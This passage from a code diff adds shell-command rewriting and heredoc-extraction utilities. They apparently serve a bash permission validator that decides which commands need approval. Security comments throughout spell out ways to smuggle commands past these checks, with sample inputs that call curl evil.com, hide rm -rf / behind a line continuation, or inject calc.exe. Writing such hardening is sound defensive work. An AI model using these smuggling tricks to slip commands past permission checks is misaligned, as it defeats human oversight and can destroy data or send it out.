+  if (!parseResult.success) {
+    return quoteWithEvalStdinRedirect(command)
+  }
+
+  const parsed = parseResult.tokens
+
+  // SECURITY: shell-quote tokenizes differently from bash. Input like
+  // `echo {"hi":\"hi;calc.exe"}` is a bash syntax error (unbalanced quote),
+  // but shell-quote parses it into tokens with `;` as an operator and
+  // `calc.exe` as a separate word. Rebuilding from those tokens produces
+  // valid bash that executes `calc.exe` — turning a syntax error into an
+  // injection. Unbalanced delimiters in a string token signal this
+  // misparsing; fall back to whole-command quoting, which preserves the
+  // original (bash then rejects it with the same syntax error it would have
+  // raised without us).
+  if (hasMalformedTokens(joined, parsed)) {
+    return quoteWithEvalStdinRedirect(command)
+  }
+
+  const firstPipeIndex = findFirstPipeOperator(parsed)
+
+  if (firstPipeIndex <= 0) {
+    return quoteWithEvalStdinRedirect(command)
+  }
+
+  // Rebuild: first_command < /dev/null | rest_of_pipeline
+  const parts = [
+    ...buildCommandParts(parsed, 0, firstPipeIndex),
+    '< /dev/null',
+    ...buildCommandParts(parsed, firstPipeIndex, parsed.length),
+  ]
+
+  return singleQuoteForEval(parts.join(' '))
+}
+
+/**
+ * Finds the index of the first pipe operator in parsed shell command
+ */
+function findFirstPipeOperator(parsed: ParseEntry[]): number {
+  for (let i = 0; i < parsed.length; i++) {
+    const entry = parsed[i]
+    if (isOperator(entry, '|')) {
+      return i
+    }
+  }
+  return -1
+}
+
+/**
+ * Builds command parts from parsed entries, handling strings and operators.
+ * Special handling for file descriptor redirections to preserve them as single units.
+ */
+function buildCommandParts(
+  parsed: ParseEntry[],
+  start: number,
+  end: number,
+): string[] {
+  const parts: string[] = []
+  // Track if we've seen a non-env-var string token yet
+  // Environment variables are only valid at the start of a command
+  let seenNonEnvVar = false
+
+  for (let i = start; i < end; i++) {
+    const entry = parsed[i]
+
+    // Check for file descriptor redirections (e.g., 2>&1, 2>/dev/null)
+    if (
+      typeof entry === 'string' &&
+      /^[012]$/.test(entry) &&
+      i + 2 < end &&
+      isOperator(parsed[i + 1])
+    ) {
+      const op = parsed[i + 1] as { op: string }
+      const target = parsed[i + 2]
+
+      // Handle 2>&1 style redirections
+      if (
+        op.op === '>&' &&
+        typeof target === 'string' &&
+        /^[012]$/.test(target)
+      ) {
+        parts.push(`${entry}>&${target}`)
+        i += 2
+        continue
+      }
+
+      // Handle 2>/dev/null style redirections
+      if (op.op === '>' && target === '/dev/null') {
+        parts.push(`${entry}>/dev/null`)
+        i += 2
+        continue
+      }
+
+      // Handle 2> &1 style (space between > and &1)
+      if (
+        op.op === '>' &&
+        typeof target === 'string' &&
+        target.startsWith('&')
+      ) {
+        const fd = target.slice(1)
+        if (/^[012]$/.test(fd)) {
+          parts.push(`${entry}>&${fd}`)
+          i += 2
+          continue
+        }
+      }
+    }
+
+    // Handle regular entries
+    if (typeof entry === 'string') {
+      // Environment variable assignments are only valid at the start of a command,
+      // before any non-env-var tokens (the actual command and its arguments)
+      const isEnvVar = !seenNonEnvVar && isEnvironmentVariableAssignment(entry)
+
+      if (isEnvVar) {
+        // For env var assignments, we need to preserve the = but quote the value if needed
+        // Split into name and value parts
+        const eqIndex = entry.indexOf('=')
+        const name = entry.slice(0, eqIndex)
+        const value = entry.slice(eqIndex + 1)
+
+        // Quote the value part to handle spaces and special characters
+        const quotedValue = quote([value])
+        parts.push(`${name}=${quotedValue}`)
+      } else {
+        // Once we see a non-env-var string, all subsequent strings are arguments
+        seenNonEnvVar = true
+        parts.push(quote([entry]))
+      }
+    } else if (isOperator(entry)) {
+      // Special handling for glob operators
+      if (entry.op === 'glob' && 'pattern' in entry) {
+        // Don't quote glob patterns - they need to remain as-is for shell expansion
+        parts.push(entry.pattern as string)
+      } else {
+        parts.push(entry.op)
+        // Reset after command separators - the next command can have its own env vars
+        if (isCommandSeparator(entry.op)) {
+          seenNonEnvVar = false
+        }
+      }
+    }
+  }
+
+  return parts
+}
+
+/**
+ * Checks if a string is an environment variable assignment (VAR=value)
+ * Environment variable names must start with letter or underscore,
+ * followed by letters, numbers, or underscores
+ */
+function isEnvironmentVariableAssignment(str: string): boolean {
+  return /^[A-Za-z_][A-Za-z0-9_]*=/.test(str)
+}
+
+/**
+ * Checks if an operator is a command separator that starts a new command context.
+ * After these operators, environment variable assignments are valid again.
+ */
+function isCommandSeparator(op: string): boolean {
+  return op === '&&' || op === '||' || op === ';'
+}
+
+/**
+ * Type guard to check if a parsed entry is an operator
+ */
+function isOperator(entry: unknown, op?: string): entry is { op: string } {
+  if (!entry || typeof entry !== 'object' || !('op' in entry)) {
+    return false
+  }
+  return op ? entry.op === op : true
+}
+
+/**
+ * Checks if a command contains bash control structures that shell-quote cannot parse.
+ * These include for/while/until/if/case/select loops and conditionals.
+ * We match keywords followed by whitespace to avoid false positives with commands
+ * or arguments that happen to contain these words.
+ */
+function containsControlStructure(command: string): boolean {
+  return /\b(for|while|until|if|case|select)\s/.test(command)
+}
+
+/**
+ * Quotes a command and adds `< /dev/null` as a shell redirect on eval, rather than
+ * as an eval argument. This is critical for pipe commands where we can't parse the
+ * pipe boundary (e.g., commands with $(), backticks, or control structures).
+ *
+ * Using `singleQuoteForEval(cmd) + ' < /dev/null'` produces: eval 'cmd' < /dev/null
+ *   → eval's stdin is /dev/null, eval evaluates 'cmd', pipes inside work correctly
+ *
+ * The previous approach `quote([cmd, '<', '/dev/null'])` produced: eval 'cmd' \< /dev/null
+ *   → eval concatenates args to 'cmd < /dev/null', redirect applies to LAST pipe command
+ */
+function quoteWithEvalStdinRedirect(command: string): string {
+  return singleQuoteForEval(command) + ' < /dev/null'
+}
+
+/**
+ * Single-quote a string for use as an eval argument. Escapes embedded single
+ * quotes via '"'"' (close-sq, literal-sq-in-dq, reopen-sq). Used instead of
+ * shell-quote's quote() which switches to double-quote mode when the input
+ * contains single quotes and then escapes ! -> \!, corrupting jq/awk filters
+ * like `select(.x != .y)` into `select(.x \!= .y)`.
+ */
+function singleQuoteForEval(s: string): string {
+  return "'" + s.replace(/'/g, `'"'"'`) + "'"
+}
+
+/**
+ * Joins shell continuation lines (backslash-newline) into a single line.
+ * Only joins when there's an odd number of backslashes before the newline
+ * (the last one escapes the newline). Even backslashes pair up as escape
+ * sequences and the newline remains a separator.
+ */
+function joinContinuationLines(command: string): string {
+  return command.replace(/\\+\n/g, match => {
+    const backslashCount = match.length - 1 // -1 for the newline
+    if (backslashCount % 2 === 1) {
+      // Odd number: last backslash escapes the newline (line continuation)
+      return '\\'.repeat(backslashCount - 1)
+    } else {
+      // Even number: all pair up, newline is a real separator
+      return match
+    }
+  })
+}
@@ -0,0 +1,733 @@
+/**
+ * Heredoc extraction and restoration utilities.
+ *
+ * The shell-quote library parses `<<` as two separate `<` redirect operators,
+ * which breaks command splitting for heredoc syntax. This module provides
+ * utilities to extract heredocs before parsing and restore them after.
+ *
+ * Supported heredoc variations:
+ * - <<WORD      - basic heredoc
+ * - <<'WORD'    - single-quoted delimiter (no variable expansion in content)
+ * - <<"WORD"    - double-quoted delimiter (with variable expansion)
+ * - <<-WORD     - dash prefix (strips leading tabs from content)
+ * - <<-'WORD'   - combined dash and quoted delimiter
+ *
+ * Known limitations:
+ * - Heredocs inside backtick command substitution may not be extracted
+ * - Very complex multi-heredoc scenarios may not be extracted
+ *
+ * When extraction fails, the command passes through unchanged. This is safe
+ * because the unextracted heredoc will either cause shell-quote parsing to fail
+ * (falling back to treating the whole command as one unit) or require manual
+ * approval for each apparent subcommand.
+ *
+ * @module
+ */
+
+import { randomBytes } from 'crypto'
+
+const HEREDOC_PLACEHOLDER_PREFIX = '__HEREDOC_'
+const HEREDOC_PLACEHOLDER_SUFFIX = '__'
+
+/**
+ * Generates a random hex string for placeholder uniqueness.
+ * This prevents collision when command text literally contains "__HEREDOC_N__".
+ */
+function generatePlaceholderSalt(): string {
+  // Generate 8 random bytes as hex (16 characters)
+  return randomBytes(8).toString('hex')
+}
+
+/**
+ * Regex pattern for matching heredoc start syntax.
+ *
+ * Two alternatives handle quoted vs unquoted delimiters differently:
+ *
+ * Alternative 1 (quoted): (['"]) (\\?\w+) \2
+ *   Captures the opening quote, then the delimiter word (which MAY include a
+ *   leading backslash since it's literal inside quotes), then the closing quote.
+ *   In bash, single quotes make EVERYTHING literal including backslashes:
+ *     <<'\EOF' → delimiter is \EOF (with backslash)
+ *     <<'EOF'  → delimiter is EOF
+ *   Double quotes also preserve backslashes before non-special chars:
+ *     <<"\EOF" → delimiter is \EOF
+ *
+ * Alternative 2 (unquoted): \\?(\w+)
+ *   Optionally consumes a leading backslash (escape), then captures the word.
+ *   In bash, an unquoted backslash escapes the next character:
+ *     <<\EOF → delimiter is EOF (backslash consumed as escape)
+ *     <<EOF  → delimiter is EOF (plain)
+ *
+ * SECURITY: The backslash MUST be inside the capture group for quoted
+ * delimiters but OUTSIDE for unquoted ones. The old regex had \\? outside
+ * the capture group unconditionally, causing <<'\EOF' to extract delimiter
+ * "EOF" while bash uses "\EOF", allowing command smuggling.
+ *
+ * Note: Uses [ \t]* (not \s*) to avoid matching across newlines, which would be
+ * a security issue (could hide commands between << and the delimiter).
+ */
+const HEREDOC_START_PATTERN =
+  // eslint-disable-next-line custom-rules/no-lookbehind-regex -- gated by command.includes('<<') at extractHeredocs() entry
+  /(?<!<)<<(?!<)(-)?[ \t]*(?:(['"])(\\?\w+)\2|\\?(\w+))/
+
+export type HeredocInfo = {
+  /** The full heredoc text including << operator, delimiter, content, and closing delimiter */
+  fullText: string
+  /** The delimiter word (without quotes) */
+  delimiter: string
+  /** Start position of the << operator in the original command */
+  operatorStartIndex: number
+  /** End position of the << operator (exclusive) - content on same line after this is preserved */
+  operatorEndIndex: number
+  /** Start position of heredoc content (the newline before content) */
+  contentStartIndex: number
+  /** End position of heredoc content including closing delimiter (exclusive) */
+  contentEndIndex: number
+}
+
+export type HeredocExtractionResult = {
+  /** The command with heredocs replaced by placeholders */
+  processedCommand: string
+  /** Map of placeholder string to original heredoc info */
+  heredocs: Map<string, HeredocInfo>
+}
+
+/**
+ * Extracts heredocs from a command string and replaces them with placeholders.
+ *
+ * This allows shell-quote to parse the command without mangling heredoc syntax.
+ * After parsing, use `restoreHeredocs` to replace placeholders with original content.
+ *
+ * @param command - The shell command string potentially containing heredocs
+ * @returns Object containing the processed command and a map of placeholders to heredoc info
+ *
+ * @example
+ * ```ts
+ * const result = extractHeredocs(`cat <<EOF
+ * hello world
+ * EOF`);
+ * // result.processedCommand === "cat __HEREDOC_0_a1b2c3d4__" (salt varies)
+ * // result.heredocs has the mapping to restore later
+ * ```
+ */
+export function extractHeredocs(
+  command: string,
+  options?: { quotedOnly?: boolean },
+): HeredocExtractionResult {
+  const heredocs = new Map<string, HeredocInfo>()
+
+  // Quick check: if no << present, skip processing
+  if (!command.includes('<<')) {
+    return { processedCommand: command, heredocs }
+  }
+
+  // Security: Paranoid pre-validation. Our incremental quote/comment scanner
+  // (see advanceScan below) does simplified parsing that cannot handle all
+  // bash quoting constructs. If the command contains
+  // constructs that could desync our quote tracking, bail out entirely
+  // rather than risk extracting a heredoc with incorrect boundaries.
+  // This is defense-in-depth: each construct below has caused or could
+  // cause a security bypass if we attempt extraction.
+  //
+  // Specifically, we bail if the command contains:
+  // 1. $'...' or $"..." (ANSI-C / locale quoting — our quote tracker
+  //    doesn't handle the $ prefix, would misparse the quotes)
+  // 2. Backtick command substitution (backtick nesting has complex parsing
+  //    rules, and backtick acts as shell_eof_token for PST_EOFTOKEN in
+  //    make_cmd.c:606, enabling early heredoc closure that our parser
+  //    can't replicate)
+  if (/\$['"]/.test(command)) {
+    return { processedCommand: command, heredocs }
+  }
+  // Check for backticks in the command text before the first <<.
+  // Backtick nesting has complex parsing rules, and backtick acts as
+  // shell_eof_token for PST_EOFTOKEN (make_cmd.c:606), enabling early
+  // heredoc closure that our parser can't replicate. We only check
+  // before << because backticks in heredoc body content are harmless.
+  const firstHeredocPos = command.indexOf('<<')
+  if (firstHeredocPos > 0 && command.slice(0, firstHeredocPos).includes('`')) {
+    return { processedCommand: command, heredocs }
+  }
+
+  // Security: Check for arithmetic evaluation context before the first `<<`.
+  // In bash, `(( x = 1 << 2 ))` uses `<<` as a BIT-SHIFT operator, not a
+  // heredoc. If we mis-extract it, subsequent lines become "heredoc content"
+  // and are hidden from security validators, while bash executes them as
+  // separate commands. We bail entirely if `((` appears before `<<` without
+  // a matching `))` — we can't reliably distinguish arithmetic `<<` from
+  // heredoc `<<` in that context. Note: $(( is already caught by
+  // validateDangerousPatterns, but bare (( is not.
+  if (firstHeredocPos > 0) {
+    const beforeHeredoc = command.slice(0, firstHeredocPos)
+    // Count (( and )) occurrences — if unbalanced, `<<` may be arithmetic
+    const openArith = (beforeHeredoc.match(/\(\(/g) || []).length
+    const closeArith = (beforeHeredoc.match(/\)\)/g) || []).length
+    if (openArith > closeArith) {
+      return { processedCommand: command, heredocs }
+    }
+  }
+
+  // Create a global version of the pattern for iteration
+  const heredocStartPattern = new RegExp(HEREDOC_START_PATTERN.source, 'g')
+
+  const heredocMatches: HeredocInfo[] = []
+  // Security: When quotedOnly skips an unquoted heredoc, we still need to
+  // track its content range so the nesting filter can reject quoted heredocs
+  // that appear INSIDE the skipped unquoted heredoc's body. Without this,
+  // `cat <<EOF\n<<'SAFE'\n$(evil)\nSAFE\nEOF` would extract <<'SAFE' as a
+  // top-level heredoc, hiding $(evil) from validators — even though in bash,
+  // $(evil) IS executed (unquoted <<EOF expands its body).
+  const skippedHeredocRanges: Array<{
+    contentStartIndex: number
+    contentEndIndex: number
+  }> = []
+  let match: RegExpExecArray | null
+
+  // Incremental quote/comment scanner state.
+  //
+  // The regex walks forward through the command, and match.index is monotonically
+  // increasing. Previously, isInsideQuotedString and isInsideComment each
+  // re-scanned from position 0 on every match — O(n²) when the heredoc body
+  // contains many `<<` (e.g. C++ with `std::cout << ...`). A 200-line C++
+  // heredoc hit ~3.7ms per extractHeredocs call, and Bash security validation
+  // calls extractHeredocs multiple times per command.
+  //
+  // Instead, track quote/comment/escape state incrementally and advance from
+  // the last scanned position. This preserves the OLD helpers' exact semantics:
+  //
+  //   Quote state (was isInsideQuotedString) is COMMENT-BLIND — it never sees
+  //   `#` and never skips characters for being "in a comment". Inside single
+  //   quotes, everything is literal. Inside double quotes, backslash escapes
+  //   the next char. An unquoted backslash run of odd length escapes the next
+  //   char.
+  //
+  //   Comment state (was isInsideComment) observes quote state (# inside quotes
+  //   is not a comment) but NOT the reverse. The old helper used a per-call
+  //   `lineStart = lastIndexOf('\n', pos-1)+1` bound on which `#` to consider;
+  //   equivalently, any physical `\n` clears comment state — including `\n`
+  //   inside quotes (since lastIndexOf was quote-blind).
+  //
+  // SECURITY: Do NOT let comment mode suppress quote-state updates. If `#` put
+  // the scanner in a mode that skipped quote chars, then `echo x#"\n<<...`
+  // (where bash treats `#` as part of the word `x#`, NOT a comment) would
+  // report the `<<` as unquoted and EXTRACT it — hiding content from security
+  // validators. The old isInsideQuotedString was comment-blind; we preserve
+  // that. Both old and new over-eagerly treat any unquoted `#` as a comment
+  // (bash requires word-start), but since quote tracking is independent, the
+  // over-eagerness only affects the comment check — causing SKIPS (safe
+  // direction), never extra EXTRACTIONS.
+  let scanPos = 0
+  let scanInSingleQuote = false
+  let scanInDoubleQuote = false
+  let scanInComment = false
+  // Inside "...": true if the previous char was a backslash (next char is escaped).
+  // Carried across advanceScan calls so a `\` at scanPos-1 correctly escapes
+  // the char at scanPos.
+  let scanDqEscapeNext = false
+  // Unquoted context: length of the consecutive backslash run ending at scanPos-1.
+  // Used to determine if the char at scanPos is escaped (odd run = escaped).
+  let scanPendingBackslashes = 0
+
+  const advanceScan = (target: number): void => {
+    for (let i = scanPos; i < target; i++) {
+      const ch = command[i]!
+
+      // Any physical newline clears comment state. The old isInsideComment
+      // used `lineStart = lastIndexOf('\n', pos-1)+1` (quote-blind), so a
+      // `\n` inside quotes still advanced lineStart. Match that here by
+      // clearing BEFORE the quote branches.
+      if (ch === '\n') scanInComment = false
+
+      if (scanInSingleQuote) {
+        if (ch === "'") scanInSingleQuote = false
+        continue
+      }
+
+      if (scanInDoubleQuote) {
+        if (scanDqEscapeNext) {
+          scanDqEscapeNext = false
+          continue
+        }
+        if (ch === '\\') {
+          scanDqEscapeNext = true
+          continue
+        }
+        if (ch === '"') scanInDoubleQuote = false
+        continue
+      }
+
+      // Unquoted context. Quote tracking is COMMENT-BLIND (same as the old
+      // isInsideQuotedString): we do NOT skip chars for being inside a
+      // comment. Only the `#` detection itself is gated on not-in-comment.
+      if (ch === '\\') {
+        scanPendingBackslashes++
+        continue
+      }
+      const escaped = scanPendingBackslashes % 2 === 1
+      scanPendingBackslashes = 0
+      if (escaped) continue
+
+      if (ch === "'") scanInSingleQuote = true
+      else if (ch === '"') scanInDoubleQuote = true
+      else if (!scanInComment && ch === '#') scanInComment = true
+    }
+    scanPos = target
+  }
+
+  while ((match = heredocStartPattern.exec(command)) !== null) {
+    const startIndex = match.index
+
+    // Advance the incremental scanner to this match's position. After this,
+    // scanInSingleQuote/scanInDoubleQuote/scanInComment reflect the parser
+    // state immediately BEFORE startIndex, and scanPendingBackslashes is the
+    // count of unquoted `\` immediately preceding startIndex.
+    advanceScan(startIndex)
+
+    // Skip if this << is inside a quoted string (not a real heredoc operator).
+    if (scanInSingleQuote || scanInDoubleQuote) {
+      continue
+    }
+
+    // Security: Skip if this << is inside a comment (after unquoted #).
+    // In bash, `# <<EOF` is a comment — extracting it would hide commands on
+    // subsequent lines as "heredoc content" while bash executes them.
+    if (scanInComment) {
+      continue
+    }
+
+    // Security: Skip if this << is preceded by an odd number of backslashes.
+    // In bash, `\<<EOF` is NOT a heredoc — `\<` is a literal `<`, then `<EOF`
+    // is input redirection. Extracting it would drop same-line commands from
+    // security checks. The scanner tracks the unquoted backslash run ending
+    // immediately before startIndex (scanPendingBackslashes).
+    if (scanPendingBackslashes % 2 === 1) {
+      continue
+    }
+
+    // Security: Bail if this `<<` falls inside the body of a previously
+    // SKIPPED heredoc (unquoted heredoc in quotedOnly mode). In bash,
+    // `<<` inside a heredoc body is just text — it's not a nested heredoc
+    // operator. Extracting it would hide content that bash actually expands.
+    let insideSkipped = false
+    for (const skipped of skippedHeredocRanges) {
+      if (
+        startIndex > skipped.contentStartIndex &&
+        startIndex < skipped.contentEndIndex
+      ) {
+        insideSkipped = true
+        break
+      }
+    }
+    if (insideSkipped) {
+      continue
+    }
+
+    const fullMatch = match[0]
+    const isDash = match[1] === '-'
+    // Group 3 = quoted delimiter (may include backslash), group 4 = unquoted
+    const delimiter = (match[3] || match[4])!
+    const operatorEndIndex = startIndex + fullMatch.length
+
+    // Security: Two checks to verify our regex captured the full delimiter word.
+    // Any mismatch between our parsed delimiter and bash's actual delimiter
+    // could allow command smuggling past permission checks.
+
+    // Check 1: If a quote was captured (group 2), verify the closing quote
+    // was actually matched by \2 in the regex (the quoted alternative requires
+    // the closing quote). The regex's \w+ only matches [a-zA-Z0-9_], so
+    // non-word chars inside quotes (spaces, hyphens, dots) cause \w+ to stop
+    // early, leaving the closing quote unmatched.
+    // Example: <<"EO F" — regex captures "EO", misses closing ", delimiter
+    // should be "EO F" but we'd use "EO". Skip to prevent mismatch.
+    const quoteChar = match[2]
+    if (quoteChar && command[operatorEndIndex - 1] !== quoteChar) {
+      continue
+    }
+
+    // Security: Determine if the delimiter is quoted ('EOF', "EOF") or
+    // escaped (\EOF). In bash, quoted/escaped delimiters suppress all
+    // expansion in the heredoc body — content is literal text. Unquoted
+    // delimiters (<<EOF) perform full shell expansion: $(), backticks,
+    // and ${} in the body ARE executed. When quotedOnly is set, skip
+    // unquoted heredocs so their bodies remain visible to security
+    // validators (they may contain executable command substitutions).
+    const isEscapedDelimiter = fullMatch.includes('\\')
+    const isQuotedOrEscaped = !!quoteChar || isEscapedDelimiter
+    // Note: We do NOT skip unquoted heredocs here anymore when quotedOnly is
+    // set. Instead, we compute their content range and add them to
+    // skippedHeredocRanges, then skip them AFTER finding the closing
+    // delimiter. This lets the nesting filter correctly reject quoted
+    // "heredocs" that appear inside unquoted heredoc bodies.
+
+    // Check 2: Verify the next character after our match is a bash word
+    // terminator (metacharacter or end of string). Characters like word chars,
+    // quotes, $, \ mean the bash word extends beyond our match
+    // (e.g., <<'EOF'a where bash uses "EOFa" but we captured "EOF").
+    // IMPORTANT: Only match bash's actual metacharacters — space (0x20),
+    // tab (0x09), newline (0x0A), |, &, ;, (, ), <, >. Do NOT use \s which
+    // also matches \r, \f, \v, and Unicode whitespace that bash treats as
+    // regular word characters, not terminators.
+    if (operatorEndIndex < command.length) {
+      const nextChar = command[operatorEndIndex]!
+      if (!/^[ \t\n|&;()<>]$/.test(nextChar)) {
+        continue
+      }
+    }
+
+    // In bash, heredoc content starts on the NEXT LINE after the operator.
+    // Any content on the same line after <<EOF (like " && echo done") is part
+    // of the command, not the heredoc content.
+    //
+    // SECURITY: The "same line" must be the LOGICAL command line, not the
+    // first physical newline. Multi-line quoted strings extend the logical
+    // line — bash waits for the quote to close before starting to read the
+    // heredoc body. A quote-blind `indexOf('\n')` finds newlines INSIDE
+    // quoted strings, causing the body to start too early.
+    //
+    // Exploit: `echo <<'EOF' '${}\n' ; curl evil.com\nEOF`
+    //   - The `\n` inside `'${}\n'` is quoted (literal newline in a string arg)
+    //   - Bash: waits for `'` to close → logical line is
+    //     `echo <<'EOF' '${}\n' ; curl evil.com` → heredoc body = `EOF`
+    //   - Our old code: indexOf('\n') finds the quoted newline → body starts
+    //     at `' ; curl evil.com\nEOF` → curl swallowed into placeholder →
+    //     NEVER reaches permission checks.
+    //
+    // Fix: scan forward from operatorEndIndex using quote-state tracking,
+    // finding the first newline that's NOT inside a quoted string. Same
+    // quote-tracking semantics as advanceScan (already used to validate
+    // the `<<` operator position above).
+    let firstNewlineOffset = -1
+    {
+      let inSingleQuote = false
+      let inDoubleQuote = false
+      // We start with clean quote state — advanceScan already rejected the
+      // case where the `<<` operator itself is inside a quote.
+      for (let k = operatorEndIndex; k < command.length; k++) {
+        const ch = command[k]
+        if (inSingleQuote) {
+          if (ch === "'") inSingleQuote = false
+          continue
+        }
+        if (inDoubleQuote) {
+          if (ch === '\\') {
+            k++ // skip escaped char inside double quotes
+            continue
+          }
+          if (ch === '"') inDoubleQuote = false
+          continue
+        }
+        // Unquoted context
+        if (ch === '\n') {
+          firstNewlineOffset = k - operatorEndIndex
+          break
+        }
+        // Count backslashes for escape detection in unquoted context
+        let backslashCount = 0
+        for (let j = k - 1; j >= operatorEndIndex && command[j] === '\\'; j--) {
+          backslashCount++
+        }
+        if (backslashCount % 2 === 1) continue // escaped char
+        if (ch === "'") inSingleQuote = true
+        else if (ch === '"') inDoubleQuote = true
+      }
+      // If we ended while still inside a quote, the logical line never ends —
+      // there is no heredoc body. Leave firstNewlineOffset as -1 (handled below).
+    }
+
+    // If no unquoted newline found, this heredoc has no content - skip it
+    if (firstNewlineOffset === -1) {
+      continue
+    }
+
+    // Security: Check for backslash-newline continuation at the end of the
+    // same-line content (text between the operator and the newline). In bash,
+    // `\<newline>` joins lines BEFORE heredoc parsing — so:
+    //   cat <<'EOF' && \
+    //   rm -rf /
+    //   content
+    //   EOF
+    // bash joins to `cat <<'EOF' && rm -rf /` (rm is part of the command line),
+    // then heredoc body = `content`. Our extractor runs BEFORE continuation
+    // joining (commands.ts:82), so it would put `rm -rf /` in the heredoc body,
+    // hiding it from all validators. Bail if same-line content ends with an
+    // odd number of backslashes.
+    const sameLineContent = command.slice(
+      operatorEndIndex,
+      operatorEndIndex + firstNewlineOffset,
+    )
+    let trailingBackslashes = 0
+    for (let j = sameLineContent.length - 1; j >= 0; j--) {
+      if (sameLineContent[j] === '\\') {
+        trailingBackslashes++
+      } else {
+        break
+      }
+    }
+    if (trailingBackslashes % 2 === 1) {
+      // Odd number of trailing backslashes → last one escapes the newline
+      // → this is a line continuation. Our heredoc-before-continuation order
+      // would misparse this. Bail out.
+      continue
+    }
+
+    const contentStartIndex = operatorEndIndex + firstNewlineOffset
+    const afterNewline = command.slice(contentStartIndex + 1) // +1 to skip the newline itself
+    const contentLines = afterNewline.split('\n')
+
+    // Find the closing delimiter - must be on its own line
+    // Security: Must match bash's exact behavior to prevent parsing discrepancies
+    // that could allow command smuggling past permission checks.
+    let closingLineIndex = -1
+    for (let i = 0; i < contentLines.length; i++) {
+      const line = contentLines[i]!
+
+      if (isDash) {
+        // <<- strips leading TABS only (not spaces), per POSIX/bash spec.
+        // The line after stripping leading tabs must be exactly the delimiter.
+        const stripped = line.replace(/^\t*/, '')
+        if (stripped === delimiter) {
+          closingLineIndex = i
+          break
+        }
+      } else {
+        // << requires the closing delimiter to be exactly alone on the line
+        // with NO leading or trailing whitespace. This matches bash behavior.
+        if (line === delimiter) {
+          closingLineIndex = i
+          break
+        }
+      }
+
+      // Security: Check for PST_EOFTOKEN-like early closure (make_cmd.c:606).
+      // Inside $(), ${}, or backtick substitution, bash closes a heredoc when
+      // a line STARTS with the delimiter and contains the shell_eof_token
+      // (`)`, `}`, or backtick) anywhere after it. Our parser only does exact
+      // line matching, so this discrepancy could hide smuggled commands.
+      //
+      // Paranoid extension: also bail on bash metacharacters (|, &, ;, (, <,
+      // >) after the delimiter, which could indicate command syntax from a
+      // parsing discrepancy we haven't identified.
+      //
+      // For <<- heredocs, bash strips leading tabs before this check.
+      const eofCheckLine = isDash ? line.replace(/^\t*/, '') : line
+      if (
+        eofCheckLine.length > delimiter.length &&
+        eofCheckLine.startsWith(delimiter)
+      ) {
+        const charAfterDelimiter = eofCheckLine[delimiter.length]!
+        if (/^[)}`|&;(<>]$/.test(charAfterDelimiter)) {
+          // Shell metacharacter or substitution closer after delimiter —
+          // bash may close the heredoc early here. Bail out.
+          closingLineIndex = -1
+          break
+        }
+      }
+    }
+
+    // Security: If quotedOnly mode is set and this is an unquoted heredoc,
+    // record its content range for nesting checks but do NOT add it to
+    // heredocMatches. This ensures quoted "heredocs" inside its body are
+    // correctly rejected by the insideSkipped check on subsequent iterations.
+    //
+    // CRITICAL: We do this BEFORE the closingLineIndex === -1 check. If the
+    // unquoted heredoc has no closing delimiter, bash still treats everything
+    // to end-of-input as the heredoc body (and expands $() within it). We
+    // must block extraction of any subsequent quoted "heredoc" that falls
+    // inside that unbounded body.
+    if (options?.quotedOnly && !isQuotedOrEscaped) {
+      let skipContentEndIndex: number
+      if (closingLineIndex === -1) {
+        // No closing delimiter — in bash, heredoc body extends to end of
+        // input. Track the entire remaining range as "skipped body".
+        skipContentEndIndex = command.length
+      } else {
+        const skipLinesUpToClosing = contentLines.slice(0, closingLineIndex + 1)
+        const skipContentLength = skipLinesUpToClosing.join('\n').length
+        skipContentEndIndex = contentStartIndex + 1 + skipContentLength
+      }
+      skippedHeredocRanges.push({
+        contentStartIndex,
+        contentEndIndex: skipContentEndIndex,
+      })
+      continue
+    }
+
+    // If no closing delimiter found, this is malformed - skip it
+    if (closingLineIndex === -1) {
+      continue
+    }
+
+    // Calculate end position: contentStartIndex + 1 (newline) + length of lines up to and including closing delimiter
+    const linesUpToClosing = contentLines.slice(0, closingLineIndex + 1)
+    const contentLength = linesUpToClosing.join('\n').length
+    const contentEndIndex = contentStartIndex + 1 + contentLength
+
+    // Security: Bail if this heredoc's content range OVERLAPS with any
+    // previously-skipped heredoc's content range. This catches the case where
+    // two heredocs share a command line (`cat <<EOF <<'SAFE'`) and the first
+    // is unquoted (skipped in quotedOnly mode). In bash, when multiple heredocs
+    // share a line, their bodies appear SEQUENTIALLY (first's body, then
+    // second's). Both compute contentStartIndex from the SAME newline, so the
+    // second's body search walks through the first's body. For:
+    //   cat <<EOF <<'SAFE'
+    //   $(evil_command)
+    //   EOF
+    //   safe body
+    //   SAFE
+    // ...the quoted <<'SAFE' would incorrectly extract lines 2-4 as its body,
+    // swallowing `$(evil_command)` (which bash EXECUTES via the unquoted
+    // <<EOF's expansion) into the placeholder, hiding it from validators.
+    //
+    // The insideSkipped check above doesn't catch this because the quoted
+    // operator's startIndex is on the command line BEFORE contentStart.
+    // The contentStartPositions dedup check below doesn't catch it because the
+    // skipped heredoc is in skippedHeredocRanges, not topLevelHeredocs.
+    let overlapsSkipped = false
+    for (const skipped of skippedHeredocRanges) {
+      // Ranges [a,b) and [c,d) overlap iff a < d && c < b
+      if (
+        contentStartIndex < skipped.contentEndIndex &&
+        skipped.contentStartIndex < contentEndIndex
+      ) {
+        overlapsSkipped = true
+        break
+      }
+    }
+    if (overlapsSkipped) {
+      continue
+    }
+
+    // Build fullText: operator + newline + content (normalized form for restoration)
+    // This creates a clean heredoc that can be restored correctly
+    const operatorText = command.slice(startIndex, operatorEndIndex)
+    const contentText = command.slice(contentStartIndex, contentEndIndex)
+    const fullText = operatorText + contentText
+
+    heredocMatches.push({
+      fullText,
+      delimiter,
+      operatorStartIndex: startIndex,
+      operatorEndIndex,
+      contentStartIndex,
+      contentEndIndex,
+    })
+  }
+
+  // If no valid heredocs found, return original
+  if (heredocMatches.length === 0) {
+    return { processedCommand: command, heredocs }
+  }
+
+  // Filter out nested heredocs - any heredoc whose operator starts inside
+  // another heredoc's content range should be excluded.
+  // This prevents corruption when heredoc content contains << patterns.
+  const topLevelHeredocs = heredocMatches.filter((candidate, _i, all) => {
+    // Check if this candidate's operator is inside any other heredoc's content
+    for (const other of all) {
+      if (candidate === other) continue
+      // Check if candidate's operator starts within other's content range
+      if (
+        candidate.operatorStartIndex > other.contentStartIndex &&
+        candidate.operatorStartIndex < other.contentEndIndex
+      ) {
+        // This heredoc is nested inside another - filter it out
+        return false
+      }
+    }
+    return true
+  })
+
+  // If filtering removed all heredocs, return original
+  if (topLevelHeredocs.length === 0) {
+    return { processedCommand: command, heredocs }
+  }
+
